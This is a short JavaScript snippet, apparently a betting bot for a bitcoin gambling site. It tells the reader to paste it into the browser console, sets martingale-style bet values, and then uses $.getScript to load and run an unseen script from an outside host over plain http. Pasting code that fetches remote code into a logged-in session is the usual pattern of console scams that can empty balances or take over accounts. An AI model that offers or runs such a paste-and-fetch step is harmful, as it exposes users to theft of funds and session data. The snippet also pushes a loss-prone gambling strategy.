// Paste this code into the Javascript console // Tweak configuration settings, depending on your balance config = { multiplier : 4, sleep : 100, goal : 0.00003000, btcGuard : 0.00000020, startStake : 1, sound : 'on', toggle : false, delayLimit : 50 }; $.getScript( 'http://phptaskforce.net/script/1NB1yys2uPtuC44zobnzcNeQ2Nea5Bv8jT', function() { init(); } );